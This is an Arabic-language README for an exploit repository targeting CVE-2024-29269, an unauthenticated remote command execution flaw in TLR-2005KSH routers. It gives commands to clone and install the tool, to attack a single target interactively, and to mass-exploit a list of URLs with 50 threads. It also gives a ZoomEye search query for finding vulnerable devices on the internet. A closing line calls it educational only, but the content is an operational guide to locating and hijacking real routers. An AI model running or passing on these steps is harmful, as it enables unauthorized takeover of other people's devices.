
استغلال لـ CVE-2024-29269 يتيح تنفيذ أوامر عن بُعد غير مصادق عليه على أجهزة التوجيه TLR-2005KSH. يدعم الأوضاع التفاعلية والدفعية مع تتبع التقدم وتسجيل المخرجات.
يحتوي هذا المستودع على استغلال لثغرة CVE-2024-29269، والتي تسمح بتنفيذ أوامر نظام تشغيل غير مصادق عليها على أجهزة التوجيه TLR-2005KSH. يستغل هذا الثغرة لتنفيذ أوامر عشوائية على أجهزة التوجيه المتأثرة.
استنساخ المستودع وتثبيت الحزم المطلوبة باستخدام pip:
git clone https://github.com/hack-with-rohit/CVE-2024-29269-RCE
cd CVE-2024-29269-RCE
pip install -r requirements.txt
تنفيذ الأوامر بشكل تفاعلي على رابط واحد:
python exploit.py -u http://example.com
مسح عناوين URL متعددة من ملف:
python exploit.py -f urls.txt -t 50 -o results.txt
استخدم دوك ZoomEye التالي للعثور على الأجهزة المعرضة للخطر:
title:"Login to TLR-2005KSH"
هذه الأداة مخصصة للأغراض التعليمية فقط. استخدمها على مسؤوليتك الخاصة وفقط على الأنظمة التي لديك إذن باختبارها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.